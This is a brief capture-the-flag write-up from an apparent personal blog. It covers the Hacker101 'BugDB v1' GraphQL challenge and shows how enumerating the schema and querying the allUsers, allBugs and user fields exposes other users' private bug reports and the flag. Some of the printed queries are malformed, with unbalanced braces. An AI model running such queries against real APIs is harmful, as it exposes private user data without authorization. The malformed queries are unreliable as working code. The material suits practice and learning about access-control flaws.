H101 - BugDB v1 - After Hours Blog

![featured image](https://images.unsplash.com/photo-1544890225-2f3faec4cd60?ixlib=rb-1.2.1&q=80&fm=jpg&crop=entropy&cs=tinysrgb&w=2000&fit=max&ixid=eyJhcHBfaWQiOjExNzczfQ) #### Skills: Web, GraphQL #### Difficulty: Easy ------------------------------------------------------------------------ ### Steps 1. open the docs to find the schema 2. open all the schemas as far as possible. `AllUsers` and `AllBugs` look interesting to query 3. query `AllUsers` 4. see users `victim` and `admin` and their given bugs 5. do query for everything in `All Bugs` as well 6. notice the private node 7. query `findBug` given the node value 8. After some trial and error (breaking down everyend point as far as possible) I ended up querying `user` 9. Flag found ```{=html}  ``` query{ allUsers{ pageInfo{ hasNextPage{ hasPreviousPage{ }, edges{ node{ id, username } }, } } Step 3 { allBugs { edges { node { id reporterId private reporter { id } } } } user { edges { node { id username bugs { edges { node { id reporterId private text reporter { id } } } } } } } } final query for flag